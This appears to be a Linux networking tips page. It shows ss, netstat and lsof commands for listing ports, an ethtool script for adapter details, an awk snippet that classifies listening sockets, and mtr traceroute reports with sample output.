There is another method here that uses less: http://www.computersecuritystudent.com/UNIX/SUDO/lesson2/.

The ss command. A very useful way to find open and listening ports on a Linux system.

The ss command for Linux allows a user to list all listening ports on a Linux system.

This command lists all listening TCP ports.

homer@deusexmachina ~ $ ss -l -t
State       Recv-Q Send-Q                          Local Address:Port                              Peer Address:Port   
LISTEN      0      1                                   127.0.0.1:4101                                         *:*       
LISTEN      0      50                                          *:netbios-ssn                                      *:*       
LISTEN      0      128                                         *:sunrpc                                       *:*       
LISTEN      0      128                                 127.0.0.1:ipp                                          *:*       
LISTEN      0      128                                         *:https                                        *:*       
LISTEN      0      50                                          *:microsoft-ds                                      *:*       
LISTEN      0      50                                         :::netbios-ssn                                     :::*       
LISTEN      0      128                                        :::sunrpc                                      :::*       
LISTEN      0      128                                       ::1:ipp                                         :::*       
LISTEN      0      128                                        :::https                                       :::*       
LISTEN      0      50                                         :::microsoft-ds                                     :::*

And this is how to list all listening UDP ports.

homer@deusexmachina ~ $ ss -l -u
State       Recv-Q Send-Q                          Local Address:Port                              Peer Address:Port   
UNCONN      0      0                                           *:bootpc                                       *:*       
UNCONN      0      0                                           *:sunrpc                                       *:*       
UNCONN      0      0                               192.168.100.4:ntp                                          *:*       
UNCONN      0      0                                   127.0.0.1:ntp                                          *:*       
UNCONN      0      0                                           *:ntp                                          *:*       
UNCONN      0      0                             192.168.100.255:netbios-ns                                      *:*       
UNCONN      0      0                               192.168.100.4:netbios-ns                                      *:*       
UNCONN      0      0                                           *:netbios-ns                                      *:*       
UNCONN      0      0                             192.168.100.255:netbios-dgm                                      *:*       
UNCONN      0      0                               192.168.100.4:netbios-dgm                                      *:*       
UNCONN      0      0                                           *:netbios-dgm                                      *:*       
UNCONN      0      0                                           *:12931                                        *:*       
UNCONN      0      0                                           *:913                                          *:*       
UNCONN      0      0                                           *:mdns                                         *:*       
UNCONN      0      0                                           *:1900                                         *:*       
UNCONN      0      0                                           *:60439                                        *:*       
UNCONN      0      0                                          :::sunrpc                                      :::*       
UNCONN      0      0                   fe80::fa1a:67ff:fe10:b163:ntp                                         :::*       
UNCONN      0      0                             fe80::7a94:7b57:ntp                                         :::*       
UNCONN      0      0                        2001:470:1f06:1b5::2:ntp                                         :::*       
UNCONN      0      0                                         ::1:ntp                                         :::*       
UNCONN      0      0                                          :::ntp                                         :::*       
UNCONN      0      0                                          :::53609                                       :::*       
UNCONN      0      0                                          :::913                                         :::*       
UNCONN      0      0                                          :::mdns                                        :::*       
UNCONN      0      0                                          :::1865                                        :::*

The output of the ss command is very much like that of the familiar netstat command, but ss has greater capabilities.

Type: ss -a to list listening and non-listening ports.

The ss -i command will list all internal TCP information. This is therefore a very useful alternative to the traditionally used netstat utility.

Useful networking commands for listing open ports and listening services.

To print a list of all open ports and established TCP connections, type this command.

homer@deusexmachina /etc/asterisk $ netstat  -vatn
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:4101          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2000            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN
tcp        0    256 192.168.100.4:443       153.107.97.168:53761    ESTABLISHED
tcp      328      0 192.168.100.4:36294     192.168.100.1:139       ESTABLISHED
tcp6       0      0 :::139                  :::*                    LISTEN
tcp6       0      0 :::111                  :::*                    LISTEN
tcp6       0      0 ::1:631                 :::*                    LISTEN
tcp6       0      0 :::443                  :::*                    LISTEN
tcp6       0      0 :::445                  :::*                    LISTEN

To list all open UDP connections, use this command.

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 0.0.0.0:111             0.0.0.0:*
udp        0      0 192.168.100.4:123       0.0.0.0:*
udp        0      0 127.0.0.1:123           0.0.0.0:*
udp        0      0 0.0.0.0:123             0.0.0.0:*
udp        0      0 192.168.100.255:137     0.0.0.0:*
udp        0      0 192.168.100.4:137       0.0.0.0:*
udp        0      0 0.0.0.0:137             0.0.0.0:*
udp        0      0 192.168.100.255:138     0.0.0.0:*
udp        0      0 192.168.100.4:138       0.0.0.0:*
udp        0      0 0.0.0.0:138             0.0.0.0:*
udp        0      0 0.0.0.0:4520            0.0.0.0:*
udp        0      0 0.0.0.0:4569            0.0.0.0:*
udp        0      0 0.0.0.0:5000            0.0.0.0:*
udp        0      0 0.0.0.0:912             0.0.0.0:*
udp        0      0 0.0.0.0:5060            0.0.0.0:*
udp        0      0 0.0.0.0:1900            0.0.0.0:*
udp        0      0 0.0.0.0:11422           0.0.0.0:*
udp6       0      0 :::111                  :::*
udp6       0      0 fe80::fa1a:67ff:fe1:123 :::*
udp6       0      0 fe80::7a94:7b57:123     :::*
udp6       0      0 2001:470:1f06:1b5:::123 :::*
udp6       0      0 ::1:123                 :::*
udp6       0      0 :::123                  :::*
udp6       0      0 :::912                  :::*
udp6       0      0 :::39542                :::*

How to list all listening connections on a Linux box.


netstat --listening

How to list all open ports on a Linux box.

homer@deusexmachina ~ $ lsof -i
COMMAND    PID  USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
gvfsd-smb 5755 homer   11u  IPv4  16578      0t0  TCP 192.168.100.4:36294->192.168.100.1:netbios-ssn (ESTABLISHED)
gvfsd-smb 5755 homer   12u  IPv4  16578      0t0  TCP 192.168.100.4:36294->192.168.100.1:netbios-ssn (ESTABLISHED)

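The lsof -i command lists the open network sockets on your system, along with the command, PID and user that own each one. Run as an ordinary user, as here, it shows only that user's own processes; run it with sudo to see every listener.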

Type: sudo apt-get install sockstat to gain sockstat, a cool FreeBSD command for querying open ports.

Leaving out the -n parameter makes netstat list the results with host and service names instead of numeric addresses and ports.

homer@deusexmachina ~ $ netstat  -vat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 localhost:4101          *:*                     LISTEN
tcp        0      0 *:netbios-ssn           *:*                     LISTEN
tcp        0      0 *:sunrpc                *:*                     LISTEN
tcp        0      0 *:cisco-sccp            *:*                     LISTEN
tcp        0      0 localhost:ipp           *:*                     LISTEN
tcp        0      0 *:https                 *:*                     LISTEN
tcp        0      0 *:microsoft-ds          *:*                     LISTEN
tcp        0    256 192.168.100.4:https     153.107.97.168:53761    ESTABLISHED
tcp      340      0 192.168.100.4:36294     192.168.100:netbios-ssn ESTABLISHED
tcp6       0      0 [::]:netbios-ssn        [::]:*                  LISTEN
tcp6       0      0 [::]:sunrpc             [::]:*                  LISTEN
tcp6       0      0 localhost:ipp           [::]:*                  LISTEN
tcp6       0      0 [::]:https              [::]:*                  LISTEN
tcp6       0      0 [::]:microsoft-ds       [::]:*                  LISTEN
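
When reviewing listings like these, the useful question is which services listen on every interface (0.0.0.0 or ::) and which are bound to loopback only. The following is an added example, not part of the original post: it sorts numeric netstat output into those groups, and the function names classify_listeners and wildcard_listeners are made up for this illustration.

```shell
#!/bin/sh
# Added example: classify listening sockets in numeric netstat output.

# Sample input: lines copied from the netstat -vatn and UDP listings above.
sample_netstat() {
cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:4101          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN
tcp        0    256 192.168.100.4:443       153.107.97.168:53761    ESTABLISHED
tcp6       0      0 ::1:631                 :::*                    LISTEN
tcp6       0      0 :::445                  :::*                    LISTEN
udp        0      0 192.168.100.4:123       0.0.0.0:*
udp        0      0 0.0.0.0:5060            0.0.0.0:*
udp6       0      0 :::912                  :::*
EOF
}

# Read numeric netstat output on stdin and print, per listening socket:
#   <scope> <proto> <port> <address>
# scope is "wildcard" (every interface), "loopback" or "specific".
classify_listeners() {
    awk '
    $1 !~ /^(tcp|udp)6?$/         { next }   # header lines
    $1 ~ /^tcp/ && $6 != "LISTEN" { next }   # TCP: keep LISTEN only
    $1 ~ /^udp/ && $5 !~ /:\*$/   { next }   # UDP has no state: keep unconnected
    {
        port = $4; sub(/.*:/, "", port)      # text after the last colon
        addr = substr($4, 1, length($4) - length(port) - 1)
        if (addr == "0.0.0.0" || addr == "::")       scope = "wildcard"
        else if (addr ~ /^127\./ || addr == "::1")   scope = "loopback"
        else                                          scope = "specific"
        print scope, $1, port, addr
    }'
}

# Only the sockets reachable on every interface, as proto/port.
wildcard_listeners() {
    classify_listeners | awk '$1 == "wildcard" { print $2 "/" $3 }'
}

sample_netstat | classify_listeners
```

On a live system, pipe the real listing in instead of the sample: netstat -vatn | wildcard_listeners.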

A useful script for gaining information about your Ethernet adapter.

This useful shell script will print information about your Ethernet or Wireless adapter. This is very useful for getting a lot of information at once.


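#!/bin/bash
# bash is needed here: "echo -e" is not portable to /bin/sh (dash, the Debian /bin/sh, prints the "-e" literally).

# Name of the network interface to query; change this to match your system.
DEV="eno16777736"

echo "Showing information for the active network interface: $DEV."

echo -e "-*- \e[1mGet timestamping information for your Ethernet device.\e[0m -*-"
echo

# Time stamping capabilities of the device.
ethtool -T "$DEV"

echo -e "-*- \e[1mPrinting main information about the Ethernet device.\e[0m -*-"
echo

# Link speed, duplex, auto-negotiation and link state.
ethtool "$DEV"

echo -e "-*- \e[1mPrinting out the permanent hardware address.\e[0m -*-"

# The permanent (burned-in) MAC address.
ethtool -P "$DEV"

echo
echo

echo -e "-*- \e[1mPrinting Ethernet adapter IP address.\e[0m -*-"

# This tip from: http://unix.stackexchange.com/questions/103241/how-to-use-ifconfig-to-show-active-interface-only
# Show the IPv4 address of every active interface except loopback.
ifconfig | grep "inet " | grep -v 127.0.0.1 | sed -e 's/Bcast//' | cut -d: -f2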

This script uses the ethtool command for the adapter details and ifconfig for the IP address. This is very good for gaining IP address info as well as other useful information in one run.

The mtr command for Linux. Another way to trace network hops using the command line.

The mtr command for Linux is another good way to trace network hops. Use it like this: mtr --report [HOST]


homer@deusexmachina ~ $ mtr --report yahoo.com
Start: Mon Jul 28 07:42:16 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2c 0.0% 10 29.0 29.3 28.9 30.0 0.0
3.|-- be2-v547-bsr02-sydnmtc.sy 0.0% 10 29.9 30.4 29.7 31.0 0.0
4.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
5.|-- bundle-ether21.ken39.sydn 0.0% 10 32.6 36.4 32.6 41.4 3.4
6.|-- bundle-ether6.ken-core4.s 0.0% 10 31.9 32.6 30.7 34.1 0.9
7.|-- bundle-ether19.ken-core10 0.0% 10 31.4 32.5 31.4 33.6 0.5
8.|-- Bundle-ether18.pad-gw2.sy 0.0% 10 32.9 32.2 30.3 34.1 0.9
9.|-- bundle-ether1.sydp-core01 0.0% 10 33.8 32.7 30.2 34.6 1.3
10.|-- i-0-1-0-3.paix-core01.bx. 0.0% 10 169.8 170.3 168.0 174.3 1.7
11.|-- i-0-5-0-2.paix02.bi.telst 0.0% 10 167.6 168.2 165.7 172.2 1.5
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-6.pat2.swp.yahoo.com 0.0% 10 186.2 186.8 185.0 192.4 2.0
14.|-- ae-5.pat2.gqb.yahoo.com 0.0% 10 201.0 198.3 189.3 201.9 5.0
15.|-- ae-0.msr2.gq1.yahoo.com 0.0% 10 190.7 193.9 189.6 219.2 8.9
16.|-- UNKNOWN-67-195-1-X.yahoo. 0.0% 10 191.5 196.9 190.2 200.8 4.6
17.|-- et-17-1.fab6-1-gdc.gq1.ya 10.0% 10 190.7 194.4 190.7 201.3 4.5
18.|-- po-14.bas1-7-prd.gq1.yaho 10.0% 10 203.2 201.7 199.1 204.0 1.6
19.|-- ir1.fp.vip.gq1.yahoo.com 10.0% 10 191.3 190.9 189.8 192.5 0.6

Use the --csv parameter like this to output in CSV format.


mtr --report yahoo.com --csv

If you want the mtr command to output using a curses interface with bold text highlighting, use this command.


mtr --report yahoo.com --curses


The --tcp parameter to mtr will use TCP SYN packets instead of ICMP echo. This is a fast way of performing a traceroute of network hops.

homer@deusexmachina ~ $ mtr --report yahoo.com --tcp
Start: Mon Jul 28 07:55:37 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2c 0.0% 10 29.8 30.1 29.5 31.3 0.3
3.|-- be2-v547-bsr02-sydnmtc.sy 0.0% 10 31.7 32.0 31.4 33.3 0.3
4.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
5.|-- bundle-ether21.ken39.sydn 0.0% 10 36.0 37.0 32.6 43.1 3.0
6.|-- bundle-ether6.ken-core4.s 0.0% 10 33.0 33.9 32.3 36.1 1.1
7.|-- bundle-ether19.ken-core10 0.0% 10 34.2 33.3 31.9 34.4 0.7
8.|-- Bundle-ether18.pad-gw2.sy 0.0% 10 34.4 34.0 31.4 37.0 1.4
9.|-- bundle-ether1.sydp-core01 0.0% 10 32.2 34.6 32.1 36.4 1.4
10.|-- i-0-3-0-1.paix-core01.bx. 0.0% 10 176.6 170.9 168.2 176.6 2.3
11.|-- i-0-0-0-2.paix02.bi.telst 0.0% 10 170.4 169.6 168.3 174.9 1.9
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-7.pat2.dnx.yahoo.com 0.0% 10 194.2 198.9 194.2 228.1 10.4
14.|-- ae-6.pat1.nez.yahoo.com 0.0% 10 203.3 206.9 202.8 223.4 6.3
15.|-- ae-0.msr2.ne1.yahoo.com 0.0% 10 215.3 209.4 201.9 225.8 8.6
16.|-- ae-0.clr1-a-gdc.ne1.yahoo 10.0% 10 214.0 213.6 202.8 220.8 4.6
17.|-- UNKNOWN-98-138-97-X.yahoo 10.0% 10 213.5 209.0 203.8 221.4 6.3
18.|-- po-10.bas1-7-prd.ne1.yaho 10.0% 10 215.1 212.3 204.4 221.1 5.9
19.|-- ir1.fp.vip.ne1.yahoo.com 10.0% 10 266.0 252.0 212.0 301.6 31.8

And finally, the --report-wide parameter will show a wider display of the output.


homer@deusexmachina ~ $ mtr --report yahoo.com --tcp --report-wide
Start: Mon Jul 28 07:57:34 2014
HOST: deusexmachina Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.100.1 0.0% 10 0.3 0.3 0.3 0.4 0.0
2.|-- 185.3.148.122.network.m2core.net.au 0.0% 10 30.2 30.0 29.4 30.8 0.0
3.|-- be2-v547-bsr02-sydnmtc.syd.nsw.m2core.net.au 0.0% 10 32.2 31.8 31.3 32.5 0.0
4.|-- 66.3.148.122.network.m2core.net.au 70.0% 10 32.4 364.2 32.4 1027. 574.4
5.|-- bundle-ether21.ken39.sydney.telstra.net 0.0% 10 39.6 37.8 32.6 43.0 3.4
6.|-- bundle-ether6.ken-core4.sydney.telstra.net 0.0% 10 35.4 34.4 31.9 37.4 1.8
7.|-- bundle-ether19.ken-core10.sydney.telstra.net 0.0% 10 35.3 33.4 31.4 35.3 0.8
8.|-- Bundle-ether18.pad-gw2.sydney.telstra.net 0.0% 10 33.1 33.8 32.1 37.0 1.3
9.|-- bundle-ether1.sydp-core01.sydney.reach.com 0.0% 10 34.7 33.3 31.5 34.7 0.9
10.|-- i-0-3-0-2.paix-core01.bx.telstraglobal.net 0.0% 10 168.3 171.7 168.3 176.8 2.6
11.|-- i-0-0-0-7.paix02.bi.telstraglobal.net 0.0% 10 170.1 169.5 168.2 171.1 0.7
12.|-- ??? 100.0 10 0.0 0.0 0.0 0.0 0.0
13.|-- ae-7.pat2.dnx.yahoo.com 0.0% 10 227.5 202.9 194.1 227.5 11.0
14.|-- ae-5.pat2.nez.yahoo.com 0.0% 10 210.4 205.1 202.9 210.4 2.4
15.|-- ae-0.msr1.ne1.yahoo.com 0.0% 10 203.7 209.7 203.0 216.5 6.3
16.|-- UNKNOWN-98-138-97-X.yahoo.com 10.0% 10 214.3 213.5 204.6 217.4 4.1
17.|-- UNKNOWN-98-138-97-X.yahoo.com 10.0% 10 216.2 211.1 203.0 216.5 5.8
18.|-- po-14.bas2-7-prd.ne1.yahoo.com 10.0% 10 214.8 209.2 203.0 217.5 6.0
19.|-- ir1.fp.vip.ne1.yahoo.com 10.0% 10 265.8 234.2 212.3 301.5 34.2